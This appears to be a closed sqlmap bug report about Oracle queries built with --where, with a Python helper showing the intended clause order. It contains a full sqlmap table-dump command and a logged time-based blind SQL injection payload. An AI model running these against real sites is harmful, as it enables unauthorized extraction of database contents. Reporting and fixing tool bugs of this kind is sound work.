Closed
Description
Hi,
Please check the logs below: shouldn't it be "AS LIMIT FROM db.table WHERE column1=to_char(123) qq" rather than "AS WHERE column1=to_char(123) LIMIT FROM db.table qq"?
Thanks.
python sqlmap.py -u "https://..." --data="t=1" --dbms "Oracle" -D "db" -T "table" -C "column1" --dump --random-agent --keep-alive --timeout=300 --time-sec=300 -o -v 4 --where column1="to_char(123)"
[22:35:41] [PAYLOAD] 1' AND 3784=(CASE WHEN (ASCII(SUBSTRC((SELECT NVL(CAST(column1 AS VARCHAR(4000)),CHR(32)) FROM (SELECT qq.*,ROWNUM AS WHERE column1=123 LIMIT FROM db.table qq) WHERE LIMIT=1),1,1))>1) THEN DBMS_PIPE.RECEIVE_MESSAGE(CHR(75)||CHR(98)||CHR(76)||CHR(121),300) ELSE 3784 END) AND 'mhTz'='mhTz
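For reference, the clause ordering the report is about, as an added example that is not sqlmap's own code: Oracle has no LIMIT/OFFSET, so a per-row dump wraps the table in a subquery that exposes ROWNUM under an alias and filters on that alias in the outer query. A user-supplied --where condition belongs inside that inner subquery, after the table name and its alias, so that ROWNUM is numbered over the filtered rows. The helper names, the alias `qq`, and the extracted "broken" query string below are assumptions for illustration; the page does not show how sqlmap itself assembles the query.

```python
import re

# Added example, not sqlmap's code. Builds the Oracle row-limiting wrapper
# used for one-row-at-a-time dumps and checks that a WHERE condition lands
# in the right place. Names and strings here are assumptions for illustration.

INNER_ALIAS = "qq"  # assumed alias for the wrapped table, as in the reported payload


def oracle_row_query(column, table, row, where=None):
    """Return the Oracle query that fetches row number `row` of `column` from `table`.

    Inner subquery: SELECT qq.*,ROWNUM AS LIMIT FROM <table> qq [WHERE <cond>]
    Outer query:    SELECT NVL(CAST(<column> AS VARCHAR(4000)),CHR(32)) FROM (<inner>) WHERE LIMIT=<row>

    The optional condition goes after the table and its alias in the inner
    SELECT; Oracle assigns ROWNUM after WHERE filtering, so numbering is
    over the matching rows only.
    """
    inner = "SELECT %s.*,ROWNUM AS LIMIT FROM %s %s" % (INNER_ALIAS, table, INNER_ALIAS)
    if where:
        inner += " WHERE %s" % where
    return "SELECT NVL(CAST(%s AS VARCHAR(4000)),CHR(32)) FROM (%s) WHERE LIMIT=%d" % (column, inner, row)


# Inner subquery pulled out of the full query: everything between "FROM (" and
# the closing ") WHERE LIMIT=<n>" at the end of the string.
INNER_RE = re.compile(r"FROM \((SELECT .*?)\) WHERE LIMIT=\d+$")

# Expected shape of the inner subquery: alias.*, ROWNUM alias, FROM, table,
# table alias, and only then an optional WHERE clause.
ORDER_RE = re.compile(r"^SELECT \w+\.\*,ROWNUM AS LIMIT FROM \S+ \w+( WHERE .+)?$")


def inner_clause_order_ok(query):
    """Return True if the inner subquery keeps the clause order Oracle expects."""
    match = INNER_RE.search(query)
    if not match:
        return False
    return ORDER_RE.match(match.group(1)) is not None


# The SQL portion of the reported payload (constructed here by hand from the
# log line above, with the surrounding boolean/time-delay wrapper stripped).
BROKEN_FROM_ISSUE = (
    "SELECT NVL(CAST(column1 AS VARCHAR(4000)),CHR(32)) "
    "FROM (SELECT qq.*,ROWNUM AS WHERE column1=123 LIMIT FROM db.table qq) WHERE LIMIT=1"
)

if __name__ == "__main__":
    good = oracle_row_query("column1", "db.table", 1, "column1=to_char(123)")
    print(good)
    print("expected form ok:", inner_clause_order_ok(good))
    print("reported form ok:", inner_clause_order_ok(BROKEN_FROM_ISSUE))
```

One caveat worth keeping in mind when placing the condition: if it were moved to the outer query next to `LIMIT=1`, ROWNUM would be numbered over the unfiltered table, and a dump that walks rows 1, 2, 3 ... would return nothing for every row that fails the condition, while putting it inside the wrapper keeps the numbering dense over matching rows.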